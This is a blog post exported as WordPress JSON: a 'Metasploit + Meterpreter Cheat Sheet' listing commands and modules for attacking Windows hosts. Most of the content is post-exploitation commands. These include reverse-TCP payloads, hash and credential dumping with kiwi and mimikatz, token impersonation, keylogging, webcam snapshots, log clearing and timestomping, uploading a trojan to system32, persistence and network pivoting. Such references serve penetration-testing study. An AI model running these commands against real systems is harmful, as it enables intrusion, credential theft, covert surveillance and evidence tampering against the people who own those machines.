{"id":1083,"date":"2021-02-08T19:58:45","date_gmt":"2021-02-08T19:58:45","guid":{"rendered":"https:\/\/dft.wiki\/?p=1083"},"modified":"2022-01-01T19:13:00","modified_gmt":"2022-01-01T19:13:00","slug":"metasploit-meterpreter-cheat-sheet","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=1083","title":{"rendered":"Metasploit + Meterpreter Cheat Sheet"},"content":{"rendered":"<p><strong>Metasploit Cheat Sheet<\/strong><\/p>\n<ul>\n<li>service postgresql start<\/li>\n<li>msfdb init<\/li>\n<li>msfconsole -q\n<ul>\n<li>db_status<\/li>\n<li>db_nmap -sn [&#8230;] \/ db_nmap -T4 -A -v [&#8230;]<\/li>\n<li>show<\/li>\n<li>info [&#8230;]<\/li>\n<li>use [&#8230;]\n<ul>\n<li>info<\/li>\n<li>options<\/li>\n<li>payloads<\/li>\n<li>targets<\/li>\n<li>run \/ exploit \/ exploit -j -z\n<ul>\n<li>Ctrl+Z<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>jobs<\/li>\n<li>sessions<\/li>\n<li>sessions -i #<\/li>\n<li>search [&#8230;]<\/li>\n<li>spool<\/li>\n<li>post<\/li>\n<li>load<\/li>\n<li>db_nmap -sV 10.10.10.10\n<ul>\n<li>hosts<\/li>\n<li>services<\/li>\n<li>vulns<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>searchsploit [&#8230;]<\/li>\n<\/ul>\n<p><strong>Metasploit Global Variables<\/strong><\/p>\n<ul>\n<li>setg HOST 10.10.10.10<\/li>\n<li>setg PORT 8888<\/li>\n<li>get HOST<\/li>\n<li>unset HOST<\/li>\n<\/ul>\n<p><strong>Metasploit Popular Modules<\/strong><\/p>\n<ul>\n<li>exploit\/multi\/handler<\/li>\n<li>payload\/windows\/x64\/meterpreter_reverse_tcp<\/li>\n<li>payload\/windows\/meterpreter\/reverse_tcp<\/li>\n<li>post\/windows\/gather\/hashdump<\/li>\n<li>post\/windows\/manage\/migrate<\/li>\n<li>exploit\/windows\/local\/persistence<\/li>\n<li>exploit\/windows\/local\/registry_persistence<\/li>\n<li>post\/multi\/recon\/local_exploit_suggester<\/li>\n<li>post\/windows\/gather\/checkvm<\/li>\n<li>post\/windows\/manage\/enable_rdp<\/li>\n<li>post\/multi\/manage\/shell_to_meterpreter<\/li>\n<li>auxiliary\/server\/socks5<\/li>\n<\/ul>\n<p><strong>Meterpreter Cheat 
Sheet<\/strong><\/p>\n<ul>\n<li>help<\/li>\n<li>background<\/li>\n<li>bgrun<\/li>\n<li>bglist<\/li>\n<li>bgkill<\/li>\n<li>cat<\/li>\n<li>del<\/li>\n<li>timestomp<\/li>\n<li>pwd<\/li>\n<li>clearev<\/li>\n<li>download c:\\\\boot.ini<\/li>\n<li>upload trojan.exe c:\\\\windows\\\\system32<\/li>\n<li>edit edit.txt<\/li>\n<li>execute -f cmd.exe -i -H<\/li>\n<li>resource resource.txt<\/li>\n<li>search -f autoexec.bat \/\u00a0search -f sea*.bat c:\\\\xamp\\\\<\/li>\n<li>getuid<\/li>\n<li>idletime<\/li>\n<li>ipconfig<\/li>\n<li>portfwd<\/li>\n<li>route<\/li>\n<li>sysinfo<\/li>\n<li>hashdump<\/li>\n<li>getsystem<\/li>\n<li>exploit<\/li>\n<li>interact<\/li>\n<li>ps<\/li>\n<li>ipconfig<\/li>\n<li>source<\/li>\n<li>shell<\/li>\n<li>lcd<\/li>\n<li>lpwd<\/li>\n<li>lls<\/li>\n<li>migrate PID<\/li>\n<li>keyscan_start<\/li>\n<li>keyscan_stop<\/li>\n<li>keyscan_dump<\/li>\n<li>screenshot<\/li>\n<li>webcam_list<\/li>\n<li>webcam_snap<\/li>\n<li>load incognito\n<ul>\n<li>list_tokens -u<\/li>\n<li>list_tokens -g<\/li>\n<li>impersonate_token \\\\WORKGROUP\\Administrator<\/li>\n<\/ul>\n<\/li>\n<li>load kiwi\n<ul>\n<li>help<\/li>\n<li>getprivs<\/li>\n<li>creds_all\n<ul>\n<li>Syntax USER:RELATIVE_IDENTIFIER:LM:NT<\/li>\n<\/ul>\n<\/li>\n<li>rev2self<\/li>\n<li>upload fileName<\/li>\n<\/ul>\n<\/li>\n<li>load mimikatz\n<ul>\n<li>help<\/li>\n<li>kerberos<\/li>\n<\/ul>\n<\/li>\n<li>run persistence -h<\/li>\n<li>run netsvc -A<\/li>\n<li>run autoroute -s 10.0.0.0\/24<\/li>\n<li>run autoroute -s 172.16.0.0 -n 255.255.0.0<\/li>\n<li>run autoroute -p<\/li>\n<li>run post\/multi\/recon\/local_exploit_suggester<\/li>\n<li>run post\/windows\/manage\/enable_rdp<\/li>\n<li>run auxiliary\/server\/socks5<\/li>\n<li>Ctrl+Z\n<ul>\n<li>use post\/multi\/manage\/shell_to_meterpreter<\/li>\n<li>set session 1<\/li>\n<li>run<\/li>\n<li>hashdump<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Metasploit Cheat Sheet service postgresql start msfdb init msfconsole -q db_status db_nmap -sn 
[&#8230;] \/ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-1083","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1083","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1083"}],"version-history":[{"count":5,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1083\/revisions"}],"predecessor-version":[{"id":2646,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1083\/revisions\/2646"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1083"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1083"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1083"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}